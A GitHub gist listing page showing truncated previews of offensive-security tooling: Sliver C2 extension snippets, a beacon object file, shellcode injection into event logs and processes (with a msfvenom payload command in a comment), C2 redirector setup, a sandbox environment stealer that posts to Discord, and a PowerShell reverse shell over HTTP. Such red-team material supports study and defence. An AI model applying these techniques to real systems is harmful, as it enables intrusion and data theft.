Benjamin Heise benheise
benheise
/ gist:b4d0c25f5c557a9cabea99006ffba2aa
Created
February 16, 2023 16:55
— forked from freefirex/gist:dec308e1d95c6ea090c61d31a4db6f89
vscode user snippet for sliver coff extensions
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "SliverExtension" :{ | |
| "prefix": "sliverext", | |
| "body": [ "{", | |
| "\"name\": \"$1\",", | |
| "\"version\": \"0.0.0\",", | |
| "\"command_name\": \"$2\",", | |
| "\"extension_author\": \"$3\",", | |
| "\"original_author\": \"$3\",", | |
| "\"repo_url\": \"N/A\",", |
benheise
/ COFF_With_Exception_handler.c
Created
February 16, 2023 16:54
— forked from freefirex/COFF_With_Exception_handler.c
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #define _WIN32_WINNT 0x0502 | |
| #define WINVER 0x0502 | |
| #include <windows.h> | |
| #include <errhandlingapi.h> | |
| #include <process.h> | |
| #include "beacon.h" | |
| WINBASEAPI PVOID WINAPI KERNEL32$AddVectoredExceptionHandler (ULONG First, PVECTORED_EXCEPTION_HANDLER Handler); | |
| DECLSPEC_IMPORT uintptr_t __cdecl MSVCRT$_beginthreadex(void *_Security,unsigned _StackSize,_beginthreadex_proc_type _StartAddress,void *_ArgList,unsigned _InitFlag,unsigned *_ThrdAddr); | |
| DECLSPEC_IMPORT void __cdecl MSVCRT$_endthreadex(unsigned _Retval); |
benheise
/ EventLogInject.cs
Created
May 9, 2022 17:56
POC to inject and extract shellcode from Windows Event Logs
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Collections.Generic; | |
| using System.Diagnostics; | |
| using System.Linq; | |
| using System.Runtime.InteropServices; | |
| using System.Text; | |
| using System.Threading.Tasks; | |
| namespace HiddenEventLogs | |
| { |
benheise
/ Automated-Redirectors.py
Created
February 21, 2022 23:08
— forked from mhaskar/Automated-Redirectors.py
Python script to create HTTPS redirectors that pointing to your C2
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| import requests | |
| import json | |
| import time | |
| import paramiko | |
| from Crypto.PublicKey import RSA | |
| from os import chmod | |
| public_key_name = "test1.key" |
benheise
/ Shellcode-Process-Injector.c
Created
February 21, 2022 23:07
— forked from mhaskar/Shellcode-Process-Injector.c
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <windows.h> | |
| #include <sys/types.h> | |
| #include <unistd.h> | |
| int main(int argc, char **argv){ | |
| //msfvenom -p windows/exec cmd=calc.exe EXITFUNC=thread -f c -v shellcode |
benheise
/ sandbox-env-stealer.py
Created
February 16, 2022 14:45
— forked from Albocoder/sandbox-env-stealer.py
The python code used to take the environment data from sandboxes and send them to discord server.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ################################################################################# | |
| # # | |
| # Refer to this blog post about what this code is used for: # | |
| # https://albocoder.github.io/malware/2021/06/01/SandboxStudy.html # | |
| # # | |
| ################################################################################# | |
| import requests | |
| import os | |
| import psutil |
benheise
/ ComWithoutRegistering.cs
Created
February 11, 2022 16:42
— forked from jjeffery/ComWithoutRegistering.cs
COM without registering
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.ComponentModel; | |
| using System.Runtime.InteropServices; | |
| namespace ComWithoutRegisteringExample | |
| { | |
| internal static class ComHelper | |
| { | |
| private delegate int DllGetClassObject(ref Guid clsid, ref Guid iid, [Out, MarshalAs(UnmanagedType.Interface)] out IClassFactory classFactory); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| //Example Reference: | |
| // https://unit42.paloaltonetworks.com/unit42-houdinis-magic-reappearance/ | |
| // Test | |
| new ActiveXObject('WScript.Shell').Environment('Process')('TMP') = 'C:\\Tools'; | |
| // Change that C:\\Tools to a location you specify, or dynamically find current directory. | |
| // ActCTX will search for the DLL in TMP | |
| var manifest = '<?xml version="1.0" encoding="UTF-16" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity type="win32" name="DynamicWrapperX" version="2.2.0.0"/> <file name="dynwrapx.dll"> <comClass description="DynamicWrapperX Class" clsid="{89565276-A714-4a43-912E-978B935EDCCC}" threadingModel="Both" progid="DynamicWrapperX"/> </file> </assembly>'; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <# | |
| .SYNOPSIS | |
| Simple Reverse Shell over HTTP. Deliver the link to the target and wait for connectback. | |
| Read And Write Files Over WebDAV Proof Of Concept | |
| .PARAMETER Server | |
| Listening Server IP Address |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| sing System; | |
| using System.Diagnostics; | |
| using System.Reflection; | |
| using System.Configuration.Install; | |
| using System.Runtime.InteropServices; | |
| /* | |
| Author: Casey Smith, Twitter: @subTee |
NewerOlder